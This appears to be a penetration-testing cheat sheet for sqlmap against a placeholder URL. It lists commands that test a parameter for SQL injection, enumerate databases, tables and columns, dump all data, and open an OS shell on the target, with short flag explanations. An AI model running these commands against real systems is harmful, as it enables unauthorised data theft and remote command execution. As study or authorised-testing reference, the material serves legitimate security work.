Test id parameter
sqlmap -u "http://example.com/admin.php?id=1" -p "id"
Dump database
sqlmap -u "http://example.com/admin.php?id=1" -p "id" --dbms=mysql --dump
Get a shell
sqlmap -u "http://example.com/admin.php?id=1" -p "id" --dbms=mysql --os-shell
1. Check whether the parameter is injectable (in this case, the parameter id)
sqlmap -u "http://example.com/admin.php?id=1"
2. If it's injectable, check the DB banner
sqlmap -u "http://example.com/admin.php?id=1" -b
3. Retrieve more info: discover the DB tables
sqlmap -u "http://example.com/admin.php?id=1" --tables
4. Retrieve all columns from a DB (--current-db takes no argument and only prints the current database name; -D selects the database)
sqlmap -u "http://example.com/admin.php?id=1" -D databaseName --columns
5. Retrieve all the data from a DB
sqlmap -u "http://example.com/admin.php?id=1" -D databaseName --dump
# -v3 increases sqlmap's verbosity and shows which payloads sqlmap is using
# --users enumerates the DB users
# --dbs shows which databases are connected to the application
# -D specify database
# -T specify table
# -C specify columns, separated by commas
# --technique= specify the SQLi technique, e.g. U for union or B for boolean
# -r specify a file containing a request intercepted with Burp, to use instead of a URL
# --flush-session discards the stored session data for the target so it is tested again from scratch